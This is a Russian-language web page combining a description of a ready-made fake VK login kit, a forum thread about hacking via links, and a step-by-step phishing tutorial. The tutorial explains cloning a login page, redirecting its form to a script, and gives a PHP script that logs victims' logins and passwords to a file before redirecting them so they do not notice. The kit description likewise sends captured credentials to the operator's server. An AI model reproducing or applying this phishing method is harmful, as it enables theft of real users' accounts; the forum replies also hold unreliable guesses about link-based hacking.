Фейк ссылки для ВК чтобы стырить пароль

Содержание

Описание.
Скачав файлы, вы получите готовую копию главной страницы авторизации/регистрации.

  • При нажатии на кнопку входа — все данные введенные в поля «Телефон или email» и «Пароль» будут проверены оригинальной функцией VK. Если данные введены корректно, то далее выполняются следующие шаги:
  • 1. Отправка данных на наш сервер.
  • 2. Запись полученных данных. (см. в настройках «Режимы записи»)
  • 3. Переадресация пользователя на страницу повторной авторизации (невалидных данных) оф. сайта.
  • Все файлы разложены удобно по папкам.
  • Файлы, находящиеся в директории «SAVE», недоступны извне! (Не рекомендуется изменять файл «.htaccess» внутри данной папки)
  • Все «ненужные» ссылки либо ведут на оф. сайт, либо при нажатии ничего не происходит.
  • Отсутствует проверка на вилид данных.
  • Удалена вся реклама.
  • Все файлы загружаются только с нашего сервера.
  • Данная копия уникальная, так как РИПнута мной с нуля.

Директория «SAVE» содержит:

ВЗЛОМ ВК! КАК ПОЛУЧИТЬ ДОСТУП К ЛЮБОЙ СТРАНИЦЕ? (НЕДОХАКЕРЫ)


— «.htaccess» — Защита (файла с данными) от доступа извне.
— «accounts.txt» — Файл с данными (сюда записываются все логи).
— «local.sql» — Файл Базы Данных.

  • Настройка Базы Данных.
  • Смена «Режима записи». Возможность записывать данные либо в Базу Данных, либо в Файл, либо туда и туда.
  • Изменение названия файла для данных.
  • Изменение формата записи в файл (пример: «email:pass»).
  1. Залить все файлы на хостинг.
  2. Создать Базу Данных и импортировать туда файл «local.sql».
  3. Произвести настройки в файле «settings.php».

Источник: forumteam.live

Взлом по ссылке возможен?

Появился вопрос. Если тебе в ВК кинули ссылку могут ли тебя взломать с помощью неё или нет. Имеется в виду не ссылки с фейк сайтами а чистые ссылки для взлома.

Олдфаг
Участник
Начинающий

Мне затирают что ты перешёл по ссылке и спиздили логин с паролем а не ссылки с фейк сайтом ВК просто обычная ссылка по переходу которой ты взломан

Пользователь

Мне затирают что ты перешёл по ссылке и спиздили логин с паролем а не ссылки с фейк сайтом ВК просто обычная ссылка по переходу которой ты взломан

Могут сделать так, что будет кнопка и если ты на её нажмёшь то им придут IP, геоданные, информация о системе и даже будет доступ к вебке.
Но только если ты подтвердишь доступ к камере.

Еще по теме:  Как создать альбом в ВК на телефоне

А так вроде если ты не подтвердишь, ток то, что я перечислил могут украсть (я не уверен, но вроде как возможно).

Пользователь

Не возможно не хуя не кому твой айпи нах@й не всрался если вай фай динамический и если ты живешь в 5-10 этажном доме ток если ты сам введешь свои данные случайно

Начинающий

Могут сделать так, что будет кнопка и если ты на её нажмёшь то отошлётся им IP, геоданные, информация о системе и даже будет доступ к вебке.
Но только если ты подтвердишь доступ к камере.

А так вроде если ты не подтвердишь, ток айпи, геоданные и другую информацию могут украсть (я не уверен, но вроде как возможно).

А логин и пороли соц сетей будут в ходить в другую информацию?
Пользователь
А логин и пороли соц сетей будут в ходить в другую информацию?
Нет.
Их точно не украдут. Только через фейк сайт.
Эксперт

:roflanzdarova:

Извиняюсь что сюда вмешиваюсь
Бред уровня : смотрю дамбаза

Могут сделать так, что будет кнопка и если ты на её нажмёшь то им придут IP, геоданные, информация о системе и даже будет доступ к вебке.
Но только если ты подтвердишь доступ к камере.

А так вроде если ты не подтвердишь, ток то, что я перечислил могут украсть (я не уверен, но вроде как возможно).

По теме: Да,можно через апи управлять.
Пользователь
Хрен знает насколько это правда но когда то были вот такие вещи(не реклама)


Пользователь

:roflanzdarova:

Извиняюсь что сюда вмешиваюсь
Бред уровня : смотрю дамбаза

По теме: Да,можно через апи управлять.

:roflanEbalo:

Я сказал, что не уверен. Я просто видел видео где тестят эту хрень.
Челик по ссылке переходит, нажимает на кнопку, его спрашивает гугл, мол хотите разрешить доступ к камере? он нажимает да и другому челику приходят скриншоты раз в 5 секунд с его лицом

Источник: yougame.biz

Как угнать пароли жертвы через фейковый сайт

❌ Строго в ознакомительных целях. Вы научитесь создавать фишинговые сайты с нуля. Просто следуйте инструкции и у вас получиться, даже если вы совсем новичок.

Еще по теме:  Как написать человеку если у него закрыта личка Вконтакте

Всем салют, дорогие друзья!

Уверен, что вам хотя бы однажды приходила в голову мысль на подобии: “как мне получить доступ к чужому VK, Instagram, почте и прочим учеткам?”.

⚡️ Спешу вас обрадовать: ничего особо сложного в этом нет. Эта статья — именно то, что вам нужно. Инструкция приведенная здесь — универсальная и может быть использована для создания фишинговой копии любого сайта.

  • Для начала, если вы совсем новичок, напомню, что такое фишинг:

Фишинг (англ. phishing от fishing «рыбная ловля, выуживание») — вид интернет-мошенничества, целью которого является получение доступа к конфиденциальным данным пользователей — логинам и паролям.

Ну, а теперь давайте начнём.

Важная ремарка: статья написана в строго образовательных целях. Я не призываю вас к противозаконным действиям. Вся ответственность за ваши поступки будет лежать исключительно на вас.

Копирование​ сайта

Для начала нам необходимо скопировать оригинальную страницу, чтобы наша получилась идентичной настоящей.

Это нужно для того, чтобы пользователь зашедший туда, увидел привычную и знакомую форму входа и без лишних размышлений ввёл свой логин и пароль.

✅ Предлагаю рассмотреть все на примере создания фейковой страницы VK

  • Для начала создаём для нашего фейка отдельную папку на компьютере. Туда мы и будем скидывать все нужные для него файлы.
  • Далее открываем нужный нам сайт в браузере и заходим на страницу авторизации
  • Теперь сохраняем эту страницу: правая кнопка мыши -> Cохранить как.

  • В появившемся окне выбираем тип сохраняемого файла:Веб-страница полностью. В имени файла пишем index.htm

Теперь давайте разбираться с кодом.

Разбираемся в HTML​

  • С помощью блокнота открываем исходный код сохраненной страницы index.htm

Множество странных и непонятных закорючек — это исходный код страницы.

Как говорится “глаза бояться, а руки делают”, поэтому не бойтесь и начинайте работать 🙂

Помните, когда мы с вами сохраняли страницу, рядом с полем для ввода логина и пароля наверняка были подписи (логично предположить, что там было написано «логин» и «пароль»)? Вот по ним и будем ориентироваться.

  • Ищем среди всего этого безобразия данные слова. Рядом с ними на странице у нас располагались поля ввода логина и пасса. В html коде они будут выглядеть примерно вот так:

input type=»text» name=»login» value=»» . . input type=»password» name=»password» . .

Имена полей (в коде идут после «name=») не всегда будут именно login и password. Где-то это могут быть e-mail и pass , а где-то и username, parol.(оформление и названия зависит от кодера и сайта)

P.S. Блок с надписями «логин», «пароль» и формами ввода почти всегда находится в тэге .

  • Временно записываем или запоминаем имена этих паролей
  • Ищем через Ctrl+F запрос «action»
Еще по теме:  Как так шоу Вконтакте

form name=»login» [U]action=»users/passcheck.php»[/U] method=»post» onsubmit=»return check();»>

  • Меняем строку и прописываем параметру action значение login.php (если параметра action там нет — введите его сами: action=»login.php»)
  • Ищем параметр method (в той же строчке что form и action) и ставим ему значение “post” или “get”
  • Сохраняемся и закрываем.

Волшебный скрипт​

Наш скрипт будет выполнять самую важную функцию – перехват и запись введенных жертвой логина и пароля.

  • Вот его код:

?PHP $Log = $_POST[‘login’]; $Pass = $_POST[‘password’]; $log = fopen(«database.txt»,»at»); fwrite($log,»n $Log:$Pass n»); fclose($log); echo «»; ?>

✅ А теперь давайте по полочкам:

  1. В первых двух строках переменным Log и Pass присваиваются значения соответствующих полей из предыдущего файла. Именно для этого мы записывали названия полей с сохранённой страницы: мы должны указать их скрипту. Меняем login и password из квадратных скобок на то, как были названы поля ввода на нашей сохранённой странице(Кавычки не трогаем!).
  2. В третьей строке происходит открытие файла database.txt для записи. (Можете назвать этот файл, как хотите, хотьI_love_Hacker_Place.txt)
  3. Главное — не забудьте, как назвали (название должно быть написано английскими буквами) и создайте текстовый документ с таким именем в папке с фейком.
  4. Четвёртая строка — запись в файл строки вида n $Log:$Pass n, где n — переход на новую строку, $Log:$Pass — значения переменных с логином и паролем, записанные через двоеточие.
  5. Строка пятая — сохранение, закрытие файла.
  6. Последняя строка — редирект (переадресация) на другую страницу (пока жертва не просекла, что это фейк). В этой строчке после URL= вписываем адрес страницы, куда попадёт пользователь сразу после того, как введёт логин и пароль (и снова будьте аккуратны с кавычкой после адреса — она должна там быть!). Лучше всего отправить его на настоящую страницу(ну, откуда там вы страничку копировали?) с сообщением о вводе неверного пароля. Тогда бедолага решит что что-то не так ввёл, попробует снова и зайдёт, ничего не заподозрив!
  • Сохраняем файл с именем login.php в папку с фейком.

Источник: www.hackerplace.org

Рейтинг
( Пока оценок нет )
Комментарии0
Загрузка ...
Похожие материалы